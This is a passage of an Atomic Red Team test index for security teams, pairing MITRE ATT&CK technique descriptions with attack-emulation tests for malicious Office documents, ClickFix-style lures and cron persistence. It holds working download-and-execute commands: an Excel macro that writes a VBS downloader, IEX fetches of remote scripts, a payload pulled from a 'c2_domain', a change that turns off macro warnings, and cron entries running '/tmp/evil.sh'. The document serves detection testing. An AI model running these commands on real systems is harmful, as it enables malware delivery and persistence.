$sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
$sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
$sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
$sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
$sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
$sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
$sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
$sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
$sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
$sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
$sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
$sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
$sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
$sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
$sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
$sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
$sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
$sheet.Cells.Item(23,1) = "=HALT()"
$sheet.Cells.Item(1,1).Name = "runme"
$xlApp.Run("runme")
$xlApp.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
[System.GC]::Collect()
[System.GC]::WaitForPendingFinalizers()
Remove-Variable xlBook
Remove-Variable xlApp
cleanup_command: |
Stop-Process -Name "procexp*" -ErrorAction Ignore
Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
name: powershell
- name: Headless Chrome code execution via VBA
auto_generated_guid: a19ee671-ed98-4e9d-b19c-d1954a51585a
description: |
This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local
webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver
and pull down the script and execute it. By default the payload will execute calc.exe on the system.
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft Word must be installed
'
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
Stop-Process -Name "winword"
exit 0 } catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
to meet this requirement"
'
- description: 'Google Chrome must be installed
'
prereq_command: |
try {
$chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Google Chrome manually
to meet this requirement"
'
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
name: powershell
cleanup_command: 'Stop-Process -name mshta
'
- name: Potentially Unwanted Applications (PUA)
auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295
description: 'The Potentially Unwanted Applications (PUA) protection feature
in antivirus software can identify and block PUAs from downloading and installing
on endpoints in your network. These applications are not considered viruses,
malware, or other types of threats, but might perform actions on endpoints
that adversely affect their performance or use. This file is similar to EICAR
test virus file, but is considered a Potentially Unwanted Application (PUA)
instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify
anti-pua protection).
'
supported_platforms:
- windows
input_arguments:
pua_url:
description: url to PotentiallyUnwanted.exe
type: url
default: http://amtso.eicar.org/PotentiallyUnwanted.exe
pua_file:
description: path to PotentiallyUnwanted.exe
type: path
default: "$env:TEMP/PotentiallyUnwanted.exe"
executor:
name: powershell
elevation_required: false
command: |
Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
& "#{pua_file}"
cleanup_command: |
Stop-Process -name PotentiallyUnwanted
Remove-Item #{pua_file} -ErrorAction Ignore
- name: Office Generic Payload Download
auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c
description: |
This Test uses a VBA macro to launch Powershell which will download a file from a user defined web server.
Required input agruments are c2_domain and file_name
Execution is handled by [Invoke-MalDoc](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
Example for c2 server located at 127.0.0.1 for the file test.txt which is nested below the parent directory in the tests/my-test folder
Example input args for file in root directory c2-domain = 127.0.0.1, file-name = test.txt
supported_platforms:
- windows
input_arguments:
macro_path:
description: 'Location of file which will be converted to a VBA macro
'
type: path
default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt
c2_domain:
description: 'This required variable points to a user defined HTTP server
that will host the file_name in the c2_parent_directory.
'
type: url
default:
c2_parent_directory:
description: |
Parent directory where you have the "malicious" file on c2_domain server.
Will default to root directory. Forward slashes are not needed at begining or ending of directory path
type: path
default: ''
file_name:
description: |
"Malicious" file to be downloaded.
This required file needs to be place on the user provided c2 domain
Example file can be found at PathToAtomicsFolder/T1204.002/src/test9-example-payload.txt
type: string
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/test9-example-payload.txt
ms_product:
description: 'Maldoc application Word or Excel
'
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: 'Destination c2_domain name or IP address must be set to a running
HTTP server.
'
prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1)
'
get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address
must be set and reachable for HTTP service"
'
- description: 'Microsoftt #{ms_product} must be installed
'
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
name: powershell
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macroCode = Get-Content "#{macro_path}" -Raw
$URL = "#{c2_domain}" + "/" + "#{c2_parent_directory}"
$macroCode = $macroCode -replace 'serverPath', $URL -replace 'fileName', "#{file_name}"
Invoke-MalDoc -macroCode $macroCode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}"
-ErrorAction Ignore
'
- name: LNK Payload Download
auto_generated_guid: 581d7521-9c4b-420e-9695-2aec5241167f
description: This lnk files invokes powershell to download putty from the internet
and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
supported_platforms:
- windows
executor:
command: |
Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
$file1 = "$env:Temp\test10.lnk"
Start-Process $file1
Start-Sleep -s 10
taskkill /IM a.exe /F
cleanup_command: |-
$file1 = "$env:Temp\test10.lnk"
$file2 = "$env:Temp\a.exe"
Remove-Item $file1 -ErrorAction Ignore
Remove-Item $file2 -ErrorAction Ignore
name: powershell
- name: Mirror Blast Emulation
auto_generated_guid: 24fd9719-7419-42dd-bce6-ab3463110b3c
description: |
Emulates the JS -> MSI chain of the MirrorBlast T505 campaign by executing an xlsm file designed.
Requires the 32 bit version of Office to run. [MirrorBlast Campaign Analysis](https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies)
supported_platforms:
- windows
executor:
command: |-
Cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force | Out-Null
& '.\Excel 2016.lnk' "PathToAtomicsFolder\T1204.002\bin\mirrorblast_emulation.xlsm"
cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security"
/v "VBAWarnings" /f
name: powershell
- name: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
auto_generated_guid: 3f3120f0-7e50-4be2-88ae-54c61230cb9f
description: |
Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
This technique relies on user interaction (Win+R + Enter) to trigger execution.
Used in social engineering campaigns that aim to bypass traditional startup methods.
Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
supported_platforms:
- windows
executor:
command: Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
-Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
-Name "atomictest" -ErrorAction SilentlyContinue
name: powershell
- name: Simulate Click-Fix via Downloaded BAT File
auto_generated_guid: 22386853-f68d-4b50-a362-de235127c443
description: Simulates user execution of a BAT file downloaded from the Atomic
Red Team GitHub repository.This test represents T1204.002 - User Execution
via Malicious File.The BAT file performs harmless terminal output to simulate
a "fix" operation.
supported_platforms:
- windows
input_arguments:
url:
description: URL to download the BAT file from
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/click-fix.bat
outfile:
description: Path where the BAT file will be saved
type: path
default: "$env:TEMP\\click-fix.bat"
executor:
command: |
$url = "#{url}"
$outfile = "#{outfile}"
Invoke-WebRequest -Uri $url -OutFile $outfile -UseBasicParsing
$process = Start-Process -FilePath $outfile -PassThru -WindowStyle Normal
$process.Id | Out-File "$env:TEMP\click-fix-pid.txt"
cleanup_command: |
if (Test-Path "$env:TEMP\click-fix-pid.txt") {
$pid = Get-Content "$env:TEMP\click-fix-pid.txt"
Stop-Process -Id $pid -Force -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\click-fix-pid.txt" -ErrorAction SilentlyContinue
}
Remove-Item "#{outfile}" -ErrorAction SilentlyContinue
name: powershell
elevation_required: false
T1053.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
created: '2019-12-03T14:25:00.538Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053/003
external_id: T1053.003
- source_name: CloudSEK ESXiArgs 2023
description: Mehardeep Singh Sawhney. (2023, February 9). Analysis of Files
Used in ESXiArgs Ransomware Attack Against VMware ESXi Servers. Retrieved
March 26, 2025.
url: https://www.cloudsek.com/blog/analysis-of-files-used-in-esxiargs-ransomware-attack-against-vmware-esxi-servers
- source_name: 20 macOS Common Tools and Techniques
description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:33.856Z'
name: 'Scheduled Task/Job: Cron'
description: |-
Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). In ESXi environments, cron jobs must be created directly via the crontab file (e.g., `/var/spool/cron/crontabs/root`).(Citation: CloudSEK ESXiArgs 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- ESXi
x_mitre_version: '1.3'
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75
description: 'This test replaces the current user''s crontab file with the contents
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
'
supported_platforms:
- linux
- macos
input_arguments:
command:
description: Command to execute
type: string
default: "/tmp/evil.sh"
tmp_cron:
description: Temporary reference file to hold evil cron schedule
type: path
default: "/tmp/persistevil"
executor:
name: sh
command: |
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
cleanup_command: 'crontab /tmp/notevil
'
- name: Cron - Add script to all cron subfolders
auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
/etc/cron.monthly and /etc/cron.weekly folders configured to execute on a
schedule. This technique was used by the threat actor Rocke during the exploitation
of Linux web servers.
'
supported_platforms:
- macos
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: string
default: persistevil
executor:
elevation_required: true
name: bash
command: |
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
cleanup_command: |
rm /etc/cron.daily/#{cron_script_name} -f
rm /etc/cron.hourly/#{cron_script_name} -f
rm /etc/cron.monthly/#{cron_script_name} -f
rm /etc/cron.weekly/#{cron_script_name} -f
- name: Cron - Add script to /etc/cron.d folder
auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846'
description: 'This test adds a script to /etc/cron.d folder configured to execute
on a schedule.
'
supported_platforms:
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo '*/5 * * * * root echo "Hello
from Atomic Red Team"' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: string
default: persistevil
executor:
elevation_required: true
name: sh
command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name}
'
cleanup_command: 'rm /etc/cron.d/#{cron_script_name} -f
'
- name: Cron - Add script to /var/spool/cron/crontabs/ folder
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
to execute on a schedule. This technique was used by the threat actor Rocke
during the exploitation of Linux web servers.
'
supported_platforms:
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in /var/spool/cron/crontabs folder
type: string
default: persistevil
executor:
elevation_required: true
name: bash
command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
'
cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -f
'
T1559.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64
created: '2020-02-12T14:09:53.107Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1559/001
external_id: T1559.001
- source_name: ProjectZero File Write EoP Apr 2018
description: 'Forshaw, J. (2018, April 18). Windows Exploitation Tricks: Exploiting
Arbitrary File Writes for Local Elevation of Privilege. Retrieved May 3,
2018.'
url: https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html
- source_name: Fireeye Hunting COM June 2019
description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
10, 2019.
url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- source_name: Microsoft COM
description: Microsoft. (n.d.). Component Object Model (COM). Retrieved November
22, 2017.
url: https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx
- source_name: Enigma MMC20 COM Jan 2017
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
url: https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
- source_name: Enigma Outlook DCOM Lateral Movement Nov 2017
description: Nelson, M. (2017, November 16). Lateral Movement using Outlook's
CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.
url: https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:35.814Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
x_mitre_remote_support: false
atomic_tests: []
T1675:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--31e5011f-090e-45be-9bb6-17a1c5e8219b
created: '2025-03-28T14:01:52.810Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1675
external_id: T1675
- source_name: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023
description: Alexander Marvi, Brad Slaybaugh, Ron Craft, and Rufus Brown.
(2023, June 13). VMware ESXi Zero-Day Used by Chinese Espionage Actor to
Perform Privileged Guest Operations on Compromised Hypervisors. Retrieved
March 26, 2025.
url: https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass/
- source_name: Broadcom Running Guest OS Operations
description: Broadcom. (n.d.). Running Guest OS Operations. Retrieved March
28, 2025.
url: https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere-sdks-tools/8-0/web-services-sdk-programming-guide/virtual-machine-guest-operations/running-guest-os-operations.html
- source_name: Broadcom VMware Tools Services
description: Broadcom. (n.d.). VMware Tools Services. Retrieved March 28,
2025.
url: https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/tools/12-4-0/vmware-tools-administration-12-4-0/introduction-to-vmware-tools/vmware-tools-service.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-16T14:57:47.078Z'
name: ESXi Administration Command
description: "Adversaries may abuse ESXi administration services to execute
commands on guest machines hosted within an ESXi virtual environment. Persistent
background services on ESXi-hosted VMs, such as the VMware Tools Daemon Service,
allow for remote management from the ESXi server. The tools daemon service
runs as `vmtoolsd.exe` on Windows guest operating systems, `vmware-tools-daemon`
on macOS, and `vmtoolsd ` on Linux.(Citation: Broadcom VMware Tools Services)
\n\nAdversaries may leverage a variety of tools to execute commands on ESXi-hosted
VMs – for example, by using the vSphere Web Services SDK to programmatically
execute commands and scripts via APIs such as `StartProgramInGuest`, `ListProcessesInGuest`,
\ `ListFileInGuest`, and `InitiateFileTransferFromGuest`.(Citation: Google
Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Broadcom Running
Guest OS Operations) This may enable follow-on behaviors on the guest VMs,
such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083),
[Data from Local System](https://attack.mitre.org/techniques/T1005), or [OS
Credential Dumping](https://attack.mitre.org/techniques/T1003). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
x_mitre_version: '1.0'
x_mitre_remote_support: false
atomic_tests: []
T1053:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
created: '2017-05-31T21:30:46.977Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053
external_id: T1053
- source_name: ProofPoint Serpent
description: Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New
Backdoor Targets French Entities with Unique Attack Chain. Retrieved April
11, 2022.
url: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain
- source_name: TechNet Task Scheduler Security
description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved
June 8, 2016.
url: https://technet.microsoft.com/en-us/library/cc785125.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:38.539Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Prashant Verma, Paladion
- Leo Loobeek, @leoloobeek
- Travis Smith, Tripwire
- Alain Homewood, Insomnia Security
- Andrew Northern, @ex_raritas
- Bryan Campbell, @bry_campbell
- Zachary Abzug, @ZackDoesML
- Selena Larson, @selenalarson
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Containers
- ESXi
x_mitre_version: '2.4'
x_mitre_remote_support: false
atomic_tests: []
T1059.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb
created: '2020-03-09T14:07:54.329Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059/002
external_id: T1059.002
- source_name: Apple AppleScript
description: Apple. (2016, January 25). Introduction to AppleScript Language
Guide. Retrieved March 28, 2020.
url: https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html
- source_name: SentinelOne macOS Red Team
description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
APIs Without Building Binaries. Retrieved July 17, 2020.'
url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- source_name: SentinelOne AppleScript
description: Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript
For Attacking macOS. Retrieved July 17, 2020.
url: https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/
- source_name: Macro Malware Targets Macs
description: Yerko Grbic. (2017, February 14). Macro Malware Targets Macs.
Retrieved July 8, 2017.
url: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:39.348Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call osascript to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Phil Stokes, SentinelOne
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.3'
identifier: T1059.002
atomic_tests:
- name: AppleScript
auto_generated_guid: 3600d97d-81b9-4171-ab96-e4386506e2c2
description: "Shell Script with AppleScript. The encoded python script will
perform an HTTP GET request to 127.0.0.1:80 with a session cookie of \"t3VhVOs/DyCcDTFzIKanRxkvk3I=\",
unless 'Little Snitch' is installed, in which case it will just exit. \nYou
can use netcat to listen for the connection and verify execution, e.g. use
\"nc -l 80\" in another terminal window before executing this test and watch
for the request.\n\nReference: https://github.com/EmpireProject/Empire\n"
supported_platforms:
- macos
executor:
